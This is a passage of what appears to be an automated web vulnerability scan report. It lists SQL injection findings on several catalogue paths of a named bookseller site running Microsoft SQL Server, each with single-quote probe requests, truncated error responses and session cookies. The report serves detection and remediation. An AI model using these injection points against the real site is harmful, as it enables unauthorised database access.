Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;

Response 2

HTTP/1.1 404 Not Found
Connection: close
Date: Sun, 06 Feb 2011 16:57:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11974


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!--
Site Name: Slackbooks.com
-->

<html xmlns="http://www.w3.org/
...[SNIP]...

1.55. http://www.slackbooks.com/ccknee [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.slackbooks.com
Path:   /ccknee

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /ccknee' HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 06 Feb 2011 16:57:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 9949

<html>
<head>
<title>Unclosed quotation mark before the character string 'ccknee''.<br>Line 1: Incorrect syntax near 'ccknee''.</title>
<style>
body {font-family:"Verd
...[SNIP]...

Request 2

GET /ccknee'' HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;

Response 2

HTTP/1.1 404 Not Found
Connection: close
Date: Sun, 06 Feb 2011 16:57:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11962


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!--
Site Name: Slackbooks.com
-->

<html xmlns="http://www.w3.org/
...[SNIP]...

1.56. http://www.slackbooks.com/ccknee [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.slackbooks.com
Path:   /ccknee

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /ccknee?1'=1 HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 06 Feb 2011 16:57:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 9884

<html>
<head>
<title>Line 1: Incorrect syntax near '='.<br>Unclosed quotation mark before the character string ''.</title>
<style>
body {font-family:"Verdana";font-wei
...[SNIP]...

Request 2

GET /ccknee?1''=1 HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;

Response 2

HTTP/1.1 404 Not Found
Connection: close
Date: Sun, 06 Feb 2011 16:57:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11980


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!--
Site Name: Slackbooks.com
-->

<html xmlns="http://www.w3.org/
...[SNIP]...

1.57. http://www.slackbooks.com/clinical+nursing+resources [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.slackbooks.com
Path:   /clinical+nursing+resources

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /clinical+nursing+resources' HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 06 Feb 2011 16:57:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10149

<html>
<head>
<title>Unclosed quotation mark before the character string 'clinical+nursing+resources''.<br>Line 1: Incorrect syntax near 'clinical+nursing+resources''.</title>
<
...[SNIP]...

Request 2

GET /clinical+nursing+resources'' HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;

Response 2

HTTP/1.1 404 Not Found
Connection: close
Date: Sun, 06 Feb 2011 16:57:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12030


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!--
Site Name: Slackbooks.com
-->

<html xmlns="http://www.w3.org/
...[SNIP]...

1.58. http://www.slackbooks.com/essentialknee [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.slackbooks.com
Path:   /essentialknee

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /essentialknee' HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sat, 05 Feb 2011 22:09:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10019

<html>
<head>
<title>Unclosed quotation mark before the character string 'essentialknee''.<br>Line 1: Incorrect syntax near 'essentialknee''.</title>
<style>
body {fon
...[SNIP]...

Request 2

GET /essentialknee'' HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Connection: close
Date: Sat, 05 Feb 2011 22:09:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=xekihsnsspcr3pi5wrb1km45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11988


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!--
Site Name: Slackbooks.com
-->

<html xmlns="http://www.w3.org/
...[SNIP]...

1.59. http://www.slackbooks.com/essentialknee [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.slackbooks.com
Path:   /essentialknee

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /essentialknee?1'=1 HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sat, 05 Feb 2011 22:09:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 9884

<html>
<head>
<title>Line 1: Incorrect syntax near '='.<br>Unclosed quotation mark before the character string ''.</title>
<style>
body {font-family:"Verdana";font-wei
...[SNIP]...

Request 2

GET /essentialknee?1''=1 HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Connection: close
Date: Sat, 05 Feb 2011 22:09:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=q1glzym555hwgv3nndsy4d55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12002


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!--
Site Name: Slackbooks.com
-->

<html xmlns="http://www.w3.org/
...[SNIP]...

1.60. http://www.slackbooks.com/gastroenterology [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.slackbooks.com
Path:   /gastroenterology

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /gastroenterology' HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 06 Feb 2011 16:57:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10049

<html>
<head>
<title>Unclosed quotation mark before the character string 'gastroenterology''.<br>Line 1: Incorrect syntax near 'gastroenterology''.</title>
<style>
bod
...[SNIP]...

Request 2

GET /gastroenterology'' HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;

Response 2

HTTP/1.1 404 Not Found
Connection: close
Date: Sun, 06 Feb 2011 16:57:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11998


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!--
Site Name: Slackbooks.com
-->

<html xmlns="http://www.w3.org/
...[SNIP]...

1.61. http://www.slackbooks.com/homemodification [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.slackbooks.com
Path:   /homemodification

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /homemodification' HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 06 Feb 2011 16:59:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10049

<html>
<head>
<title>Unclosed quotation mark before the character string 'homemodification''.<br>Line 1: Incorrect syntax near 'homemodification''.</title>
<style>
bod
...[SNIP]...

Request 2

GET /homemodification'' HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;

Response 2

HTTP/1.1 404 Not Found
Connection: close
Date: Sun, 06 Feb 2011 16:59:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11998


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!--
Site Name: Slackbooks.com
-->

<html xmlns="http://www.w3.org/
...[SNIP]...

1.62. http://www.slackbooks.com/homemodification [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.slackbooks.com
Path:   /homemodification

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /homemodification?1'=1 HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 06 Feb 2011 16:59:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 9884

<html>
<head>
<title>Line 1: Incorrect syntax near '='.<br>Unclosed quotation mark before the character string ''.</title>
<style>
body {font-family:"Verdana";font-wei
...[SNIP]...

Request 2

GET /homemodification?1''=1 HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;

Response 2

HTTP/1.1 404 Not Found
Connection: close
Date: Sun, 06 Feb 2011 16:59:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12012


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!--
Site Name: Slackbooks.com
-->

<html xmlns="http://www.w3.org/
...[SNIP]...

1.63. http://www.slackbooks.com/occupational+therapy [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.slackbooks.com
Path:   /occupational+therapy

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /occupational+therapy' HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 06 Feb 2011 17:01:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10089

<html>
<head>
<title>Unclosed quotation mark before the character string 'occupational+therapy''.<br>Line 1: Incorrect syntax near 'occupational+therapy''.</title>
<style>

...[SNIP]...

Request 2

GET /occupational+therapy'' HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;

Response 2

HTTP/1.1 404 Not Found
Connection: close
Date: Sun, 06 Feb 2011 17:01:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12010


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!--
Site Name: Slackbooks.com
-->

<html xmlns="http://www.w3.org/
...[SNIP]...

1.64. http://www.slackbooks.com/ophthalmic+technology [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.slackbooks.com
Path:   /ophthalmic+technology

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /ophthalmic+technology' HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 06 Feb 2011 17:00:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10099

<html>
<head>
<title>Unclosed quotation mark before the character string 'ophthalmic+technology''.<br>Line 1: Incorrect syntax near 'ophthalmic+technology''.</title>
<style>

...[SNIP]...

Request 2

GET /ophthalmic+technology'' HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;

Response 2

HTTP/1.1 404 Not Found
Connection: close
Date: Sun, 06 Feb 2011 17:00:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12012


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!--
Site Name: Slackbooks.com
-->

<html xmlns="http://www.w3.org/
...[SNIP]...

1.65. http://www.slackbooks.com/ophthalmology [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.slackbooks.com
Path:   /ophthalmology

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /ophthalmology' HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 06 Feb 2011 17:01:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10019

<html>
<head>
<title>Unclosed quotation mark before the character string 'ophthalmology''.<br>Line 1: Incorrect syntax near 'ophthalmology''.</title>
<style>
body {fon
...[SNIP]...

Request 2

GET /ophthalmology'' HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;

Response 2

HTTP/1.1 404 Not Found
Connection: close
Date: Sun, 06 Feb 2011 17:01:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11988


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!--
Site Name: Slackbooks.com
-->

<html xmlns="http://www.w3.org/
...[SNIP]...

1.66. http://www.slackbooks.com/orthopedics [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.slackbooks.com
Path:   /orthopedics

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /orthopedics' HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sat, 05 Feb 2011 22:09:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 9999

<html>
<head>
<title>Unclosed quotation mark before the character string 'orthopedics''.<br>Line 1: Incorrect syntax near 'orthopedics''.</title>
<style>
body {font-fa
...[SNIP]...

Request 2

GET /orthopedics'' HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Connection: close
Date: Sat, 05 Feb 2011 22:09:41 GMT
Server: Microsoft-IIS/6.0
